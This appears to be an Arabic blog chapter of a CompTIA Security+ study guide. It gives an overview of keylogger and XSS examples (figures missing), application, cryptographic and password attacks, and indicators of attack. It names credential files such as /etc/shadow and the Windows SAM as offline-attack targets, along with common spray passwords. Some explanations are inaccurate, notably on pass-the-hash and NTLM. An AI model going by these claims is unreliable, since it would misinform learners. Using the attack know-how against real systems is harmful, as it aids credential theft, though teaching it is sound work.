.py" . دعونا نلقي نظرة على النص البرمجي لتسجيل المفاتيح التالي:

 
الصوره الثانية في الفصل

يمكنك أن ترى في النص البرمجي السابق أن تسجيل DEBUG مضبوط على أدنى مستوى، مما يشير إلى أن النص البرمجي يسجل كل ضغطة مفتاح. لاحظ أيضًا الأمر "
def on_press(key)"، والذي يعني أنه في كل مرة يتم فيها الضغط على مفتاح على لوحة المفاتيح، سيتم تسجيل الحرف المقابل.

  •  تُعرف JavaScript بشكل أساسي بدورها في تطوير الويب، ولكنها تستغل أيضًا من قبل المهاجمين لتنفيذ هجمات على جانب العميل. يمكن حقن الشيفرة الخبيثة المكتوبة بـ JavaScript في صفحات الويب لتنفيذ أفعال مثل سرقة بيانات المستخدم، إعادة توجيه حركة المرور، أو تنفيذ معاملات غير مصرح بها.

غالبًا ما تستغل الحملات الإعلانية JavaScript لتوصيل حمولات خبيثة إلى المستخدمين غير المتشككين. على سبيل المثال، الشيفرة التالية تعرف زرًا على صفحة الويب "Sport Website" الذي، عند الضغط عليه، ينفذ شيفرة JavaScript خبيثة تُسمى "
badscript" (لم تُعرض الشيفرة الفعلية هنا لأسباب أمنية). اسم "badscript" سيكون "badscript.js"، كما هو موضح في الشيفرة التالية:

 
الصوره الثالثة في الفصل.
 
الـ XSS هو نوع من الهجمات حيث يقوم المستخدم بحقن شيفرة خبيثة في متصفح مستخدم آخر. تستخدم هذه الهجمة كل من HTML و JavaScript، كما هو موضح في المثال التالي:

 
 
الصوره الرابعة في الفصل.


عندما يقوم المستخدم بتحميل الصفحة في المتصفح، سيطلق تطبيق JavaScript يسمى "
myapplication والذي يمكن للمهاجم من خلاله تنفيذ الهجوم.

ملاحظة: 
يمكن العثور على مزيد من المعلومات حول هجمات XSS في الفصل 7، الذي يشرح أنواع الثغرات المختلفة.

 
 هجمات التطبيقات (Application Attacks):

هجمات التطبيقات هي نوع من التهديدات الإلكترونية التي تستغل الثغرات في تطبيقات البرمجيات، مستهدفةً نقاط الضعف في التصميم والتطوير والتنفيذ، وتهدف هذه الهجمات إلى التلاعب بالبيانات، اختراق خصوصية المستخدم، وتعطيل الوظائف. هناك ستة أنواع بارزة من هجمات التطبيقات، كما هو موضح في الفقرات التالية.
 
 هجوم الحقن (Injection Attack):

يشمل هجوم الحقن إدخال بيانات غير موثوقة بشكل خبيث إلى مدخلات التطبيق، مستغلاً الثغرات التي تتيح تنفيذ أوامر غير مقصودة. تشمل الأشكال الشائعة لهذا النوع من الهجوم الحقن SQL (حيث يتم إدخال أوامر SQL خبيثة) و XSS ، الذي يدمج سكربتات خبيثة في تطبيقات الويب. يمكن العثور على مثال لحقن SQL في قسم الثغرات المستندة إلى الويب في الفصل 7، والذي يشرح أنواع الثغرات المختلفة. تم تناول XSS في هذا الفصل في قسم الكود الخبيث السابق.
 
تذكير:
وجود SELECT* أو 1=1 يشير إلى هجوم حقن SQL.

 تجاوز السعة (Buffer Overflow):

تستفيد هجمات تجاوز السعة من إدارة الذاكرة الضعيفة، مما يتسبب في كتابة البيانات خارج مساحة الذاكرة المخصصة، ويمكن أن يؤدي ذلك إلى الكتابة فوق مواقع الذاكرة المجاورة، مما يمكّن المهاجمين من تنفيذ تعليمات برمجية عشوائية، تستخدم أنظمة تشغيل Windows الوقاية من تنفيذ البيانات (DEP) للتخفيف من تجاوزات السعة عن طريق منع تنفيذ التعليمات البرمجية في صفحات الذاكرة التي تم وضع علامة عليها بأنها غير قابلة للتنفيذ.
 
 تصعيد الامتيازات (Privilege Escalation):

تستغل هجمات تصعيد الامتيازات الثغرات للحصول على امتيازات وصول مرتفعة، مما يمكّن المهاجمين من أداء إجراءات تتجاوز مستوياتهم المصرح بها، وقد يستغل المهاجمون ثغرات البرمجيات للحصول على وصول إداري.
 
 هجمات التزوير (Forgery Attacks):

تتعامل هجمات التزوير مع البيانات (غالباً من خلال إنشاء رموز أو طلبات مزيفة) بهدف انتحال هوية المستخدمين أو التطبيقات الشرعية، وأحد الأمثلة البارزة هو التزوير عبر المواقع (CSRF)، حيث يتم خداع المستخدمين لأداء إجراءات دون موافقتهم، والتزوير من جانب الخادم (SSRF) هو ثغرة في أمان الويب تتيح للمهاجمين إرسال طلبات غير مصرح بها من الخادم، مما قد يؤدي إلى الوصول إلى بيانات حساسة أو استغلال الأنظمة الداخلية. احمِ تطبيقاتك من هذه الأنواع من الهجمات من خلال البرمجة الآمنة والتحقق من صحة المدخلات.
 
 التجوال في الدليل (Directory Traversal):

التجوال في الدليل هو عندما يهدف المهاجم إلى التنقل عبر هيكل الدليل والوصول إلى ملفات حساسة أو سرية لا ينبغي أن يكون لديهم حق الوصول إليها، وعادةً ما تكون هذه الملفات مقيدة للإداريين، وفي خادم ويب على نظام Unix/Linux (مثل Apache)، غالباً ما يستهدف المهاجمون الدليل الجذري و أدلة أخرى تحتوي على ملفات نظام هامة. بعض المسارات الشائعة التي تهم المهاجمين تشمل:


الجدول الثاني في الفصل: أدلة خادم الويب في Linux

مع تطور هجمات التطبيقات، يجب على المؤسسات اتخاذ تدابير استباقية للدفاع ضد هذه التهديدات. تتضمن بعض هذه الاستراتيجيات وأفضل الممارسات ما يلي:

  • التحقق من المدخلات (Input validation) : التحقق من المدخلات هو ممارسة أمنية مهمة تحمي التطبيقات من تجاوز السعة والتجاوزات العددية وهجمات الحقن، ويفرض هذا المبدأ التنسيق الصحيح للبيانات المدخلة في موقع الويب، مما يمنع استخدام الأحرف غير الصالحة ويعزز الأمان بشكل عام.
  • الإجراءات المخزنة (Stored procedures): الإجراءات المخزنة هي سكربتات SQL تمنع هجمات SQL، هذه السكربتات محددة مسبقًا وتمنع التلاعب، وهي أفضل طريقة لمنع هجمات حقن SQL (ويأتي التحقق من المدخلات في المرتبة الثانية).
 
الهجمات التشفيرية (Cryptographic Attacks):

هناك ساحة معركة غير مرئية حيث تسود الهجمات التشفيرية. هذه الهجمات، مثل أشباح العصر الحديث، تستخدم تقنيات غامضة لاختراق أساسيات الأمان الرقمي، وتفكيك الخوارزميات المصممة لحماية مجالاتنا الافتراضية. من بين ترسانتها ثلاث استراتيجيات مقلقة: "
الهجمات التراجعية (downgrade)" ،التي تتلاعب بالثقة؛ "هجمات الاصطدام (collision)" ، التي تشوش على النظام؛ و "هجمات عيد الميلاد (birthday)"، حيث يتم تحويل الوقت إلى سلاح. يمكن أن تأخذ هذه الهجمات عدة أشكال، ولكن الأكثر شيوعًا تم توضيحه في الأقسام التالية.
 
 الهجمات التراجعية (Downgrade Attacks):

الهجوم التراجعي يتلاعب بعملية بناء الثقة، وفي هذا الهجوم، يقوم المهاجم باعتراض وتعديل الاتصال بين طرفين، مما يجبرهم على التراجع إلى بروتوكول تشفير أضعف، تشمل هذه الهجمات ما يلي:
 
  • SSL/TLS downgrade: هجوم التراجع في SSL/TLS يحدث عندما يستغل المهاجم الثغرات في الاتصال بين العميل (مثل متصفح الويب) والخادم. يقترح المهاجم استخدام طريقة تشفير أقدم وأقل أمانًا بدلاً من الطرق الأقوى التي يدعمها كلا الطرفين. وبالتالي، يتم خداع الخادم لاستخدام بروتوكولات أو خوارزميات تشفير أقل أمانًا، مما يسهل على المهاجم اعتراض وفك تشفير البيانات المرسلة، وبالتالي يهدد أمان وسرية الاتصال.

  • SSL stripping: هذا الهجوم يتم فيه اعتراض الاتصال الآمن باستخدام HTTPS وتحويله إلى اتصال غير آمن باستخدام HTTP، مما يسمح للمهاجم بالتجسس على المعلومات الحساسة المتبادلة بين المستخدم والموقع دون اكتشاف.
 
 هجمات الاصطدام (Collision Attacks):

تعتمد التشفير على إنشاء توقيعات أو تجزئات فريدة للبيانات لضمان الأصالة والنزاهة. هجوم الاصطدام يكسر هذا المفهوم الفريد عن طريق التلاعب بدالة التجزئة. يقوم المهاجم بإنشاء مستند خبيث ومستند آخر سليم بنفس التجزئة. يتم توقيع المستند السليم، ثم يتم استبدال التوقيع بالمستند الخبيث، مما يتيح للمهاجم تزوير توقيع الهدف. يمكن استخدام هذا لتزييف مواقع ويب موثوقة أو إنشاء برامج ضارة تبدو وكأنها قادمة من مصدر موثوق.
 
هجمات عيد الميلاد (Birthday Attacks):

يستمد هجوم عيد الميلاد اسمه من ظاهرة احتمالية معروفة باسم مفارقة عيد الميلاد، وعلى الرغم من أنه قد يبدو مفاجئًا، في مجموعة من 23 شخصًا فقط، هناك احتمال 50% أن يتشارك شخصان في نفس تاريخ الميلاد (باستثناء السنة)، ويتم تطبيق هذا المبدأ على الأنظمة التشفيرية، حيث يستغل المهاجمون احتمالية إنتاج مدخلات مختلفة لنفس قيمة التجزئة، ويتيح هذا الهجوم للمهاجم إنشاء كلمات مرور مختلفة تنتج نفس قيمة التجزئة، وإذا تم مطابقة التجزئة، يعرف المهاجم كلمة المرور، مما يمنحه إمكانية الوصول غير المصرح به إلى حساب أو نظام. الحل الأفضل هو عدم استخدام MD5 الذي يستخدم 128 بت، وبدلاً من ذلك اختيار SHA3 الذي يستخدم 256 بت، حيث يوجد المزيد من التراكيب، مما يجعل كلمة المرور أصعب في الكسر.
 
هجوم تمرير التجزئة (Pass-the-Hash Attack):

هجوم تمرير التجزئة هو مصدر قلق أمني يؤثر بشكل رئيسي على أنظمة التشغيل القديمة مثل Windows NT 4.0، حيث كان بروتوكول المصادقة المستخدم هو NTLM وكانت كلمات مرور المستخدمين مخزنة محليًا ومجزأة باستخدام خوارزمية MD4، في هذه الأنظمة، يمكن للمهاجمين استغلال التجزئة الضعيفة باستخدام طرق مثل rainbow tables أو أدوات مثل hashcat لتنفيذ هجمات اصطدام التجزئة، وكانت هذه الهجمات تهدف إلى استعادة كلمات مرور المستخدمين من تمثيلاتهم المجزأة. الضعف في NTLM هو أن جميع كلمات المرور مخزنة في خدمة LSASS.

على سبيل المثال، إذا كان هناك مستخدمان لهما حق الوصول إلى نفس الكمبيوتر (أحدهما لديه حقوق إدارية) وتمكن المهاجم من الوصول إلى LSASS، يمكنه إطلاق هجوم تصعيد الامتيازات. لهذا السبب، تم استبدال NTLM بـ Active Directory (الذي يستخدم مصادقة Kerberos)، حيث يتم تخزين كلمات المرور في بيانات مشفرة. تفعيل Kerberos هو أفضل طريقة لمنع هجمات تمرير التجزئة.



 الهجمات على كلمات المرور (Password Attacks):

لا تزال كلمات المرور وسيلة شائعة للمصادقة، وكخبير في الأمن السيبراني، يجب أن تكون على دراية بالهجمات الشائعة على كلمات المرور حتى تتمكن من التعرف عليها:

  • هجوم القاموس (Dictionary attack): في هذا الهجوم، يحاول المهاجم كسر كلمات المرور باستخدام قائمة شاملة من الكلمات الموجودة في القاموس، كلمات المرور التي تحتوي على أخطاء إملائية أو أحرف خاصة مثل '$' أو '%' والتي لا توجد في القواميس تكون عادةً مقاومة لهذا النوع من الهجمات.

  • هجوم الرش على كلمة المرور (Password spraying): بدلاً من التحقق من كل تركيبة ممكنة، يركز المهاجمون على أسماء مستخدمين شائعة (مثل admin, root, أو user) ويحاولون استخدام قائمة من كلمات المرور الشائعة (مثل 123456, password, password123, letmein, و changeme)، ويمكنك منع هجوم الرش على كلمة المرور من خلال تطبيق سياسات قوية لكلمات المرور، وتفعيل المصادقة متعددة العوامل (MFA)، ومراقبة الأنظمة لرصد أنماط تسجيل الدخول غير العادية.

  • الهجوم بالقوة الغاشمة (Brute force): قد تستخدم هجمات القوة الغاشمة قوائم كلمات المرور أو جداول القوس قزح (rainbow tables)، وهي جداول محوسبة مسبقاً لقيم التجزئة لمدى واسع من كلمات المرور المحتملة، وبدلاً من تجزئة كل كلمة مرور مرشحة على حدة أثناء الهجوم بالقوة الغاشمة (الذي يمكن أن يكون بطيئاً)، يمكن للمهاجم البحث عن قيم التجزئة المحوسبة مسبقاً في جدول القوس قزح للعثور على تطابق بسرعة، من مؤشرات هجوم القوة الغاشمة هو قفل حسابات متعددة بسبب محاولات دخول فاشلة، هجمات القوة الغاشمة غالباً ما تكون مستهلكة للوقت وتتطلب موارد حاسوبية كبيرة، خاصة عند التعامل مع التشفير القوي أو كلمات المرور المعقدة، وللدفاع ضد هذه الهجمات، يمكننا تحديد عدد محاولات تسجيل الدخول من خلال إعداد قيمة منخفضة لقفل الحساب. تقنية أخرى يمكن أن تستخدمها فرق الأمن هي إضافة "salting" (راجع الفصل الرابع)، حيث يتم إرفاق قيم عشوائية بكلمة المرور. قوائم كلمات المرور وجداول القوس قزح ليست مصممة للتعامل مع القيم العشوائية.

  • الهجوم الهجين (Hybrid attack): الهجوم الهجين هو مزيج من هجوم القاموس وهجوم القوة الغاشمة.

من المهم فهم الفروقات بين الهجمات على كلمات المرور عبر الإنترنت والهجمات خارج الإنترنت. وتتمثل هذه الفروقات فيما يلي:

  • الهجوم على كلمة المرور عبر الإنترنت (Online password attack): في هذا النوع من الهجمات، يحاول المهاجم تخمين أو كسر كلمة مرور المستخدم باستخدام واجهة تسجيل الدخول الخاصة بموقع ويب، وفي الظروف المثالية، سيقوم نظام تسجيل الأمان بإرسال تنبيه بعد عدد معين من محاولات تسجيل الدخول الفاشلة، وسيتم وضع إدخال في سجلات أمان النظام يشير إلى محاولة تسجيل دخول فاشلة.

  • الهجوم على كلمة المرور خارج الإنترنت (Offline password attack): في هذا الهجوم، يتمكن المهاجمون من الوصول إلى تخزين كلمات المرور في النظام ثم يحاولون كسرها دون الاتصال بالإنترنت، وعلى سبيل المثال، قد يقومون بتنزيل نسخة من ملف      '/etc/shadow' من خادم Linux أو '%SystemRoot%\System32\config\SAM' من كمبيوتر Windows، ويمكن للمهاجم الآن أن يأخذ هذا الملف إلى منزله ويحاول كسر كلمات المرور في وقت لاحق دون تنبيه فريق الأمان.

 مؤشرات الهجوم (Indicators of Attack):

مؤشرات الهجوم (IoAs) توفر إنذارات مبكرة عن التهديدات المحتملة من خلال تحديد الأنشطة أو السلوكيات المشبوهة داخل الشبكة، مما يساعد المنظمات على الدفاع بشكل استباقي ضد الهجمات السيبرانية. فيما يلي بعض المؤشرات الشائعة التي ستساعدك على التعرف على الهجمات:

  • قفل الحساب (Account lockout): قفل الحساب يعد علامة مبكرة على وجود مشكلة. القفلات المتكررة أو غير المتوقعة، خاصة للحسابات ذات الامتيازات، قد تشير إلى محاولات خبيثة للوصول غير المصرح به. على سبيل المثال، هجوم القوة الغاشمة سيؤدي إلى قفل الحسابات لأن معظم الشركات تسمح بثلاث محاولات فقط.

  • استخدام الجلسات المتزامنة (Concurrent session usage): مراقبة عدد الجلسات المتزامنة يمكن أن تكشف عن النشاط المشبوه، والارتفاعات المفاجئة أو عدد الجلسات المتزامنة الأكبر من المعتاد قد تشير إلى وصول غير مصرح به أو خرق قيد التنفيذ.

  • المحتوى المحظور (Blocked content): يمكن أن تكشف محاولات الوصول إلى البيانات القيمة من خلال مؤشرات المحتوى المحظور، وحيث تكون الملفات محمية ببساطة بواسطة ACLs، إذا تم تكوين التدقيق، سيتم تسجيل رسالة رفض الوصول إذا حاول حساب مستخدم قراءة أو تعديل ملف لا يملك الإذن للوصول إليه. قد تكون المعلومات أيضاً محمية بواسطة نظام DLP، الذي سيسجل أيضاً أحداث المحتوى المحظور.

  • السفر المستحيل (Impossible travel): السفر المستحيل يشير إلى تسجيل الدخول من موقعين جغرافيين بعيدين في فترة زمنية غير واقعية. هذا قد يشير إلى اختراق حساب، حيث يحاول المهاجم الوصول إلى حساب من مواقع متعددة في وقت واحد.

  • استهلاك الموارد (Resource consumption): الارتفاعات غير العادية في استهلاك الموارد، مثل الاستخدام المفرط لوحدة المعالجة المركزية أو الذاكرة، قد تشير إلى إصابة بالبرمجيات الخبيثة أو هجوم DDoS يستهدف أنظمتك.

  • عدم الوصول إلى الموارد (Resource inaccessibility): عندما تصبح الموارد الحيوية فجأة غير قابلة للوصول، قد يكون ذلك علامة على هجوم سيبراني، إما بسبب مشاكل في الشبكة أو جهد متعمد لتعطيل الخدمات. مثال على ذلك هو هجوم DDoS.

  • تسجيلات غير دورية (Out-of-cycle logging): السجلات التي يتم إنشاؤها في أوقات غير عادية أو غير متوقعة يمكن أن تكون دليلاً على أنشطة مشبوهة. غالباً ما يقوم المهاجمون بتلاعب السجلات لإخفاء آثارهم، لذا فإن أوقات توليد السجلات غير المنتظمة تستدعي التحقيق.

  • الوثائق المنشورة (Published/documented): الثغرات والإعدادات التي تم نشرها أو توثيقها يمكن أن تجذب الجهات الخبيثة. التحقق بانتظام من أنظمة مؤسستك ضد هذه المشكلات المعروفة يمكن أن يساعد في منع الهجمات.

  • السجلات المفقودة (Missing logs): غياب السجلات المتوقعة (خاصة أثناء الأحداث أو الحوادث الحرجة) يمكن أن يكون علامة واضحة على التلاعب أو محاولة لإخفاء الأنشطة الخبيثة.
 
ملخص (SUMMARY):

تناول هذا الفصل أنواعاً مختلفة من هجمات البرمجيات الخبيثة، بدءاً من ransomware إلى rootkits، وثم نظرنا في الهجمات التي تؤثر على الشبكات وكلمات المرور والتطبيقات، ومن المواضيع الأخرى الرئيسية التي تم تناولها PUPs و bloatware، وتأثيراتها على أداء النظام، بالإضافة إلى الهجمات الفيزيائية مثل القوة الغاشمة والتكتيكات التي تستغل العوامل البيئية. كما تناول الفصل الهجمات على الشبكة بما في ذلك هجمات DDoS وARP poisoning، موضحاً تعقيد تحديات أمان الشبكة.

استكشفنا أنواعاً مختلفة من الهجمات على التطبيقات، مسلطين الضوء على تقنيات الحقن (injection) وoverflow للمخازن، وتأثيرها على ثغرات البرمجيات. كما تم مناقشة الهجمات المشفرة، مثل هجمات downgrade و collision ، مع التركيز على تطور تهديدات الأمان الرقمي، أخيراً، تناولنا تفاصيل هجمات كلمات المرور، مميزين بين الطرق عبر الإنترنت وخارج الإنترنت، ووضحنا مؤشرات عامة للهجمات لمساعدتك في التعرف على التهديدات المحتملة والاستجابة لها بشكل فعال.

 
النهاية:
وهذا قد اكون أنتهيت من الفصل وأتمنى انه قد أفادكم كثيراً المعرفة المكتسبة في هذا الفصل ستعدك للإجابة على أي أسئلة تتعلق بالهدف الامتحاني في امتحان CompTIA Security Plus ، الفصل التالي سيكون هو الفصل التاسع، والذي يشرح غرض تقنيات التخفيف المستخدمة لتأمين المؤسسات ، تستطيع الأنضمام الى مجتمعنا وتبدينا برأيك على تلجرام.




إرسال تعليق

0 تعليقات

إرسال تعليق (0)

#buttons=(اوافق) #days=(20)

موقعنا يستخدم ملفات تعريف الارتباط (Cookies) لتحسين تجربتك. تحقق الآن
Ok, Go it!